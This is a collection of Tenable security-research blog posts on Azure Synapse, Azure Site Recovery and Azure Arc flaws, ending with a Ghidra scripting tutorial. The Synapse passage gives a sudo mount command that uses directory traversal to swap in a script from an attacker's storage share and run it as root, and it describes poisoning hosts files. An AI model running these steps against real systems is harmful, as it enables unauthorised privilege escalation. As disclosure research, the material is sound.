sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/functions.sh source:https://[email protected] accountKey:invalid 2>&1

The functions.sh file only checks that the mountPoint begins with “/synfs” before determining that it is valid. This allows a simple directory traversal attack to bypass that function.

Now we can bypass all checks from functions.sh, remove the existing filesharemount.sh utility, and mount our own in the same directory, which still has sudo access. We created a test share using the Gen2 Storage service within Azure. We created a file in this share called “filesharemount.sh” with the contents being “id”. This allows us to demonstrate the execution privileges now granted to us.

Our mount command looks like this:

sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/ source:https://[email protected] accountKey:REDACTED 2>&1

Let’s check our access now:

Hosts File Poisoning

There exists a service on one of the hosts in each Spark pool called “HostResolver.” To be specific, it can be found at “/opt/microsoft/Microsoft.Analytics.Clusters.Services.HostResolver.dll” on each of the nodes in the Synapse environment. This service is used to manage the “hosts” file for all hosts in the Spark cluster. This supports ease-of-management — administrators can send commands to each host by a preset hostname, rather than keeping track of IP addresses, which can change based on the scaling features of the pool.

Due to the lack of any authentication features, a low-privileged user is able to overwrite the “hosts” file on all nodes in their Spark pool, which allows them to snoop on services and traffic they otherwise are not intended to be able to see. To be clear, this isn’t any sort of game-changing vulnerability or of any real significance on its own. We do believe, however, that this flaw warrants a patch due to its potential as a critical piece of a greater exploit chain. It’s also just kinda fun and interesting.

For example, here’s a view of the information used by each host:

Output:

The hostresolver can be queried like this:

What happens when a new host is added to the pool? Well, a register request is sent to the hostresolver, which parses the request, and then sends out an update to all other hosts in the pool to update their hosts file. If the entry already exists, it is overwritten.

This register request looks like this:

The updated hosts file looks like this:

This change is propagated to all hosts in the pool. As there is no authentication to this service, we can arbitrarily modify the hosts file on all nodes by manually submitting register requests. If these hosts were provisioned under our subscription ID in Azure, this wouldn’t be an issue since we’d already have full control of them. Since we don’t actually own these hosts, however, this is a slightly bigger problem.

When we originally reported this issue, communicating to hosts outside of one’s own Spark pool was possible. We assume that was a separate issue as it was fixed during the course of our own research and not publicly disclosed by Microsoft. This new inability to communicate outside of our own pool severely limits the impact of this flaw by itself, now requiring other flaws in order to achieve greater impact. At the time of this writing, the hosts file poisoning flaw remains unpatched.

Key Takeaways

Patching in cloud environments is largely out of end-users’ control. Customers are entirely beholden to the cloud providers to fix reported issues. The good news is that once an issue is fixed, it’s fixed. Customers generally don’t have any actions to take since everything happens behind the scenes.

The bad news, however, is that the cloud providers rarely provide notice that a security-related flaw was ever present in the first place. Cloud vulnerabilities rarely receive CVEs because they aren’t static products. They are ever-changing beasts with no accountability requirements in terms of notifying users and customers of security-related changes.

It doesn’t matter how good any given vendor’s software supply chain is if there are parts of the process or product that don’t rely on it. For example, the filesharemount.sh script (and other scripts discovered on these hosts) have very clear deprecation warnings in them and don’t appear to be required to go through the normal QA channels. Chances are this was a temporary script to enable necessary functionality with the intention of replacing it sometime down the line, but that sometime never arrived and it became a fairly critical component, which is a situation any software engineer is all too familiar with.

Additionally, because these environments are so volatile, it makes it difficult for security researchers to accurately gauge the impact of their findings because of strict Rules of Engagement and changes happening over the course of one’s research.

For example, in the hosts file poisoning vulnerability discussed in this blog, we noticed that we were able to change the hosts files in pools outside of our own, but this was fixed at some point during the disclosure process by introducing more robust firewalling rules at the node-level. We also noticed many changes happening with certain features of the service throughout our research, which we now know was the doing of the good folks at Orca Security during their SynLapse research.

On a final note, while we respect the efforts of researchers that go the extra mile to compromise customer data and internal vendor secrets, we believe it’s in everyone’s best interest to adhere to the rules set forth by each of the cloud vendors. Since there are so many moving pieces in these environments and likely many configurations outsiders are not privy to, violating these rules of engagement could have unintended consequences we’d rather not be responsible for. This does, however, introduce a sort of Catch-22 for researchers where the vendor can claim that a disclosure report does not adequately demonstrate impact, but also claim that a researcher has violated the rules of engagement if they do take the extra steps to do so.

For more information regarding these issues and their disclosure timelines, please see the following Tenable Research Advisories:


Microsoft Azure Synapse Pwnalytics was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Site Recovery DLL Hijacking

Azure Site Recovery is a suite of tools aimed at providing disaster recovery services for cloud resources. It provides utilities for replication, data recovery, and failover services during outages.

Tenable Research has discovered that this service is vulnerable to a DLL hijacking attack due to incorrect directory permissions. This allows any low-privileged user to escalate to SYSTEM level privileges on hosts where this service is installed.

Microsoft has assigned this issue CVE-2022–33675 and rated it a severity of Important with a CVSSv3 score 7.8. Tenable’s advisory can be found here. Microsoft’s post regarding this issue can be found here. Additionally, Microsoft is expected to award a $10,000 bug bounty for this finding.

The Flaw

The cxprocessserver service runs automatically and with SYSTEM level privileges. This is the primary service for Azure Site Recovery.

Incorrect permissions on the service’s executable directory (“E:\Program Files (x86)\Microsoft Azure Site Recovery\home\svsystems\transport\”) allow new files to be created by normal users. Please note that while the basic permissions show that “write” access is disabled, the “Special Permissions” still incorrectly grant write access to this directory. This can be verified by viewing the “Effective Access” granted to a given user for the directory in question, as demonstrated in the following screenshot.

This permissions snafu allows for a DLL hijacking/planting attack via several libraries used by the service binary.

Proof of Concept

For brevity, we’ve chosen to leave full exploitation steps out of this post since DLL hijacking techniques are extremely well documented elsewhere.

A malicious DLL was created to demonstrate the successful hijack via procmon.

Under normal circumstances, the loading of ktmw32.dll looks like the following:

With our planted DLL, the following can be observed:

This allows an attacker to elevate from an arbitrary, low-privileged user to SYSTEM. During the disclosure process, Microsoft confirmed this behavior and has created patches accordingly.

Conclusion

DLL hijacking is quite an antiquated technique that we don’t often come across these days. When we do, impact is often quite limited due to lack of security boundaries being crossed. MSRC lists several examples in their blog post discussing how they triage issues that make use of this technique.

In this case, however, we were able to cross a clear security boundary and demonstrated the ability to escalate a user to SYSTEM level permissions, which shows the growing trend of even dated techniques finding a new home in the cloud space due to added complexities in these sorts of environments.

As this vulnerability was discovered in an application used for disaster recovery, we are reminded that had this been discovered by malicious actors, most notably ransomware groups, the impact could have been much wider reaching. Ransomware groups have been known to target backup files and servers to ensure that a victim is forced into paying their ransom and unable to restore from clean backups. We strongly recommend applying the Microsoft supplied patches as soon as possible to ensure your existing deployments are properly secured. Microsoft has taken action to correct this issue, so any new deployments should not be affected by this flaw.


Microsoft Azure Site Recovery DLL Hijacking was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Logging Passwords in Plaintext in Azure Arc

Microsoft’s Azure Arc is a management platform designed to bridge multi-cloud and similarly mixed environments together in a convenient way.

Tenable Research has discovered that the Jumpstart environments for Arc do not properly use logging utilities common amongst other Azure services. This leads to potentially sensitive information, such as service principal credentials and Arc database credentials, being logged in plaintext. The log files that these credentials are stored in are accessible by any user on the system. Based on this finding, it may be possible that other services are also affected by a similar issue.

Microsoft has patched this issue and updated their documentation to warn users of credential reuse within the Jumpstart environment. Tenable’s advisory can be found here. No bounty was provided for this finding.

The Flaw

The testing environment this issue was discovered in is the ArcBox Fullbox Jumpstart environment. No additional configurations are necessary beyond the defaults.

When ArcBox-Client provisions during first-boot, it runs a PowerShell script that is sent to it via the `Microsoft.Compute.CustomScriptExtension (version 1.10.12) plugin.

Most scripts we’ve come across on other services tend to write ***REDACTED*** in place of anything sensitive when writing to a log file. For example:

<PluginSettings>
<Plugin name="Microsoft.CPlat.Core.RunCommandLinux" version="1.0.3">
<RuntimeSettings seqNo="0">{
"runtimeSettings": [
{
"handlerSettings": {
"protectedSettingsCertThumbprint": "7AF139E055555FAKEINFO555558EC374DAD46370",
"protectedSettings": "*** REDACTED ***",
"publicSettings": {}
}
}
]
}</RuntimeSettings>

In the provisioning script for this host, however, this sanitizing is not done. For example, in “C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.12\Status\0.status”, our secrets and credentials are plainly visible to everyone, including low privileged users.

This allows a malicious actor to disclose potentially sensitive information if they were to gain access to this machine. The accounts revealed could allow the attacker to further compromise a customer’s Azure environment if these credentials or accounts are re-used elsewhere.

Conclusion

Obviously, the Arc Jumpstart environment is intended to be used as a demo environment, which ideally lessens the impact of the revealed credentials — provided that users haven’t reused the service principal elsewhere in their environment. That said, it isn’t uncommon for customers to use these types of Jumpstart environments as a starting point to build out their actual production infrastructure.

We do, however, feel it’s worth being aware of this issue in the event that other logging mechanisms exist elsewhere in the Azure ecosystem, which could have more dire consequences if present in a production environment.


Logging Passwords in Plaintext in Azure Arc was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Extracting Ghidra Decompiler Output with Python

Ghidra’s decompiler, while not perfect, is pretty darn handy. Ghidra’s user interface, however, leaves a lot to be desired. I often find myself wishing there was a way to extract all the decompiler output to be able to explore it a bit easier in a text editor or at least run other tools against it.

At the time of this writing, there is no built-in functionality to export decompiler output from Ghidra. There are a handful of community made scripts available that get the job done (such as Haruspex and ExportToX64dbg), but none of these tools are as flexible as I’d like. For one, Ghidra’s scripting interface is not the easiest to work with. And two, resorting to Java or the limitations of Jython just doesn’t cut it. Essentially, I want to be able to access Ghidra’s scripting engine and API while retaining the power and flexibility of a local, fully-featured Python3 environment.

This blog will walk you through setting up a Ghidra to Python bridge and running an example script to export Ghidra’s decompiler output.

Prepping Ghidra

First and foremost, make sure you have a working installation of Ghidra on your system. Official downloads can be obtained from https://ghidra-sre.org/.

Next, you’ll want to download and install the Ghidra to Python Bridge. Steps for setting up the bridge are demonstrated below, but it is recommended to follow the official installation guide in the event that the Ghidra Bridge project changes over time and breaks these instructions.

The Ghidra to Python bridge is a local Python RPC proxy that allows you to access Ghidra objects from outside the application. A word of caution here: Using this bridge is essentially allowing arbitrary code execution on your machine. Be sure to shutdown the bridge when not in use.

In your preferred python environment, install the ghidra bridge:

$ pip install ghidra_bridge

Create a directory on your system to store Ghidra scripts in. In this example, we’ll create and use “~/ghidra_scripts.”

$ mkdir ~/ghidra_scripts

Launch Ghidra and create a new project. Create a Code Browser window (click the dragon icon in the tool chest bar) and open the Script Manager window. This can be opened by selecting “Window > Script Manager.” Press the “Manage Script Directories” in the Script Manager’s toolbar.

In the window that pops up, add and enable “$USER_HOME/ghidra_scripts” to the list of script directories.

Back in your terminal or python environment, run the Ghidra Bridge installation process.

$ python -m ghidra_bridge.install_server ~/ghidra_scripts

This will automatically copy over the scripts necessary for your system to run the Ghidra Bridge.

Finally, back in Ghidra, click the “Refresh Script List” button in the toolbar and filter the results to “bridge.”. Check the boxes next to “In Toolbar” for the Server Start and Server Shutdown scripts as pictured below. This will allow you to access the bridge’s start/stop commands from the Tools menu item.

Go ahead and start the bridge by selecting “Run in Background.” If all goes according to plan, you should see monitor output in the console window at the bottom of the window similar to the following:

Using the Ghidra Bridge

Now that you’ve got the full power and flexibility of Python, let’s put it to some good use. As mentioned earlier, the example use-case being provided in this blog is the export of Ghidra’s decompiler output.

Source code for this example is available here: https://github.com/tenable/ghidra_tools/tree/main/extract_decomps

We’ll be using an extremely simple application to demonstrate this script’s functionality, which is available in the “example” folder of the “extract_decomps” directory. All the application does is grab some input from the user and say hello.

Build and run the test application.

$ gcc test.c
$ ./a.out
What is your name?
# dino
Hello, dino!

Import the test binary into Ghidra and run an auto-analysis on it. Once complete, simply run the extraction script.

$ python extract.py
INFO:root:Program Name: a.out
INFO:root:Creation Date: Tue Jul 26 13:51:21 EDT 2022
INFO:root:Language ID: AARCH64:LE:64:AppleSilicon
INFO:root:Compiler Spec ID: default
INFO:root:Using 'a.out_extraction' as output directory…
INFO:root:Extracting decompiled functions…
INFO:root:Extracted 7 out of 7 functions
$ tree a.out_extraction
a.out_extraction
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
└── [email protected]

From here, you’re free to browse the source code in the text editor or IDE of your choice and run any other tools you see fit against this output. Please keep in mind, however, that the decompiler output from Ghidra is intended as pseudo code and won’t necessarily conform to the syntax expected by many static analysis tools.


Extracting Ghidra Decompiler Output with Python was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

❌